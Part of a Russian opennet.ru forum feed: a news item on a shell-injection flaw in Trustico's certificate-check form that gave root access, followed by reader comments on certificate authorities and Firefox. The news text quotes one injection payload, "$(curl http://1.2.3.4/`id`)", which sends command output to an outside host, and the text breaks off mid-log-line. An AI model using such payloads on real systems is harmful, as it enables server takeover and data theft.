https://ns.opennet.ru/openforum/vsluhforumID3/113715.html Вчерашняя история (https://www.opennet.ru/opennews/art.shtml?num=48166) с отзывом 23 тысяч сертификатов, выданных через реселлера Trustico, получала неожиданное продолжение. Один из пользователей сервиса обнаружил (https://twitter.com/cujanovic/status/969229397508153350) тривиальную уязвимость в web-интерфейсе, позволяющую получить root-доступ на сервер.<br><br><br>Проблема свидетельствует о наплевательском отношении к безопасности и косвенно подтверждает, что действия Trustico по отзыву сертификатов были связаны с инцидентом с безопасностью, несмотря на то, что компания отвергала подобные предположения. Суть выявленной уязвимости в передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов. В частности, если ввести shell-операторы в поле ввода домена в форме проверки корректности установки сертификата, то они будут исполнены на сервере с правами root. <br><br><br>Например, при вводе "$(curl http://1.2.3.4/`id`)" на указанный хост придёт запрос вида:<br><br><br> 1.2.3.4 - [02/Mar/2018:09:52:14] "GET https://ns.opennet.ru/openforum/vsluhforumID3/113715.html#56 Tue, 06 Mar 2018 00:23:10 GMT Прекрасно! Находил такие дыры лет 12 назад много где, но не думал, что такое до сих пор встречается в чем-то серьезнее курсовых работ. :) <br><br>Самое удивительное, что сэкономили на разработчиках те, у кого вообще затрат на ведение бизнеса почти по нулям - даже не продажа, а перепродажа воздуха. Жадность человеческая не имеет предела.<br> https://ns.opennet.ru/openforum/vsluhforumID3/113715.html#55 Mon, 05 Mar 2018 03:05:07 GMT &gt; А в это время в Firefox Nightly уже (временно) выключили блокирование сертификатов <br>&gt; от Symantec - слишком уж много сайтов поломалось. Подождут пока сиуация <br>&gt; не стабилизируется, все таки релиз ФФ60 в котормо будет эта блокировка <br>&gt; - в мае.<br>&gt; Хорошая новость же что некоторые слоупоки-админы все таки начали обновление сертификатов <br>&gt; на затронутых сайтах, наконец-то.<br><br>И, само смешное, спустя пару дней включили назад. <br> https://ns.opennet.ru/openforum/vsluhforumID3/113715.html#54 Sat, 03 Mar 2018 21:35:47 GMT Ну как сказать.. хреново работает - тот кто принимает стандарты. Например DNS. Сертификаты - это заплатка которая плохо держится.<br> https://ns.opennet.ru/openforum/vsluhforumID3/113715.html#53 Sat, 03 Mar 2018 15:07:07 GMT непонял, это как: "запретить взламывать" или "запретить быть взламываемыми"?<br> https://ns.opennet.ru/openforum/vsluhforumID3/113715.html#52 Sat, 03 Mar 2018 14:42:35 GMT А в это время в Firefox Nightly уже (временно) выключили блокирование сертификатов от Symantec - слишком уж много сайтов поломалось. Подождут пока сиуация не стабилизируется, все таки релиз ФФ60 в котормо будет эта блокировка - в мае.<br>Хорошая новость же что некоторые слоупоки-админы все таки начали обновление сертификатов на затронутых сайтах, наконец-то.<br> https://ns.opennet.ru/openforum/vsluhforumID3/113715.html#49 Sat, 03 Mar 2018 10:44:09 GMT &gt; Вот даже интересно после появление Let's Encrypt пошла какая то полоса неудач <br>&gt; у всех остальных сертификаторов......прям совпадение.....<br><br>Это не совпадение, а следствие: комод теряет доход и пытается подмять остатки бизнеса на платных сертификатах.<br> https://ns.opennet.ru/openforum/vsluhforumID3/113715.html#48 Sat, 03 Mar 2018 10:42:09 GMT Нет, про получателей отката от комода за переход к ним с дигисерта. Такое впечатление, что их в яслях или в школе врать не научили, и они наивно полагали, что просто так можно краденные серты предъявить.<br> https://ns.opennet.ru/openforum/vsluhforumID3/113715.html#47 Sat, 03 Mar 2018 10:28:28 GMT Всем кто смеет хреново работать и раздолбайствовать.<br> https://ns.opennet.ru/openforum/vsluhforumID3/113715.html#46 Sat, 03 Mar 2018 08:41:59 GMT В общем, сам принцип доверенных сертификатов пошёл по песде. Набуя вообще эти списки доверенных по умолчанию? Пусть каждый сам решает кому доверять, или ставит дополнение, которое решает за него.<br>